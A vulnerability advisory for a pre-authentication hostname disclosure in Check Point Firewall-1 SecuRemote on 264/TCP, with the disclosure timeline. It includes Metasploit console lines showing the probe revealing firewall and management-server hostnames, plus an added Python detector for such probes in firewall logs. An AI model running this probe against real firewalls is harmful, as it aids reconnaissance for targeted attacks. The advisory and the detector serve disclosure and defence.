CheckPoint Firewall SecuRemote Hostname Information Disclosure
Release Date: 12-Mar-2012
Software: CheckPoint Firewall / VPN-1 / http://www.checkpoint.com/
Versions tested: NGX R65, R71. Other versions untested but likely affected.
Vulnerability discovered: By sending a pre-authentication topology request to the VPN SecuRemote service, it is possible to obtain the firewall hostname and the name of the logging or management station (such as SmartCenter).
Vulnerability impact: Low – Information disclosure potentially reveals the client naming scheme and the firewall management station hostname. This allows attacks to be specifically targeted at the enterprise firewall management server.
Vulnerability information: By sending a certain query to port 264/TCP on CheckPoint Firewall-1, the hostname is revealed. A Metasploit module is available to test for this vulnerability.
msf auxiliary(checkpoint_hostname) > set RHOST A.B.C.D
msf auxiliary(checkpoint_hostname) > run
[*] Attempting to contact Checkpoint FW1 SecuRemote Topology service…
[+] Appears to be a CheckPoint Firewall…
[+] Firewall Host: CPSYDFW1
[+] SmartCenter Host: CPSYDMGMTSVR
[*] Auxiliary module execution completed
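As an added example (not code from this advisory, from Check Point or from the Metasploit module), a small log check a defender could run while no vendor fix exists: it counts accepted 264/TCP connections from sources outside the known remote-access client ranges, which is where an unauthenticated topology probe of the SecuRemote service would show up. The key=value log format and all addresses are constructed for the example.

```python
"""Flag pre-authentication probes of the SecuRemote topology service (264/TCP).
Added example; log format below is constructed, not Check Point's own."""
import ipaddress
import re
from collections import Counter

# Constructed sample of firewall connection logs (hypothetical key=value format).
SAMPLE_LOG = """\
time=2012-03-12T09:14:01 action=accept src=203.0.113.7 dst=198.51.100.1 proto=tcp dport=264
time=2012-03-12T09:14:02 action=accept src=203.0.113.7 dst=198.51.100.1 proto=tcp dport=264
time=2012-03-12T09:14:03 action=accept src=203.0.113.7 dst=198.51.100.1 proto=tcp dport=264
time=2012-03-12T09:15:10 action=accept src=192.0.2.55 dst=198.51.100.1 proto=tcp dport=264
time=2012-03-12T09:15:11 action=accept src=192.0.2.55 dst=198.51.100.1 proto=udp dport=500
time=2012-03-12T09:16:00 action=accept src=198.51.100.22 dst=198.51.100.1 proto=tcp dport=264
time=2012-03-12T09:16:30 action=drop src=203.0.113.9 dst=198.51.100.1 proto=tcp dport=264
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")
SECUREMOTE_TOPOLOGY_PORT = 264  # port named in the advisory


def parse_line(line):
    """Turn one key=value log line into a dict of its fields."""
    return dict(FIELD_RE.findall(line))


def topology_probes(log_text, trusted_nets, min_hits=1):
    """Count accepted 264/TCP connections per source outside trusted_nets.

    Remote-access users legitimately fetch the topology, so known client
    ranges are excluded; anything else is a candidate pre-auth hostname probe.
    Returns {source_ip: hit_count} for sources with at least min_hits hits.
    """
    nets = [ipaddress.ip_network(n) for n in trusted_nets]
    hits = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec.get("action") != "accept" or rec.get("proto") != "tcp":
            continue  # dropped traffic never reached the service
        if int(rec.get("dport", 0)) != SECUREMOTE_TOPOLOGY_PORT:
            continue
        src = ipaddress.ip_address(rec["src"])
        if any(src in n for n in nets):
            continue  # expected SecuRemote client range
        hits[str(src)] += 1
    return {src: n for src, n in hits.items() if n >= min_hits}


if __name__ == "__main__":
    for src, n in topology_probes(SAMPLE_LOG, ["198.51.100.0/24"]).items():
        print(f"{src}: {n} topology request(s) to 264/TCP")
```

Raising min_hits separates a one-off connection from repeated probing of the same firewall.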
Recommendation: None at this time. Consider a different VPN headend.
Credit: This vulnerability was disclosed by Patrick Webster.
Exploit: A Metasploit module is available here:
Timeline:
14-Dec-2011 – Discovered during audit.
21-Dec-2011 – Added auxiliary module to the Metasploit Framework.
23-Dec-2011 – Notified vendor. No response.
12-Mar-2012 – Disclosure.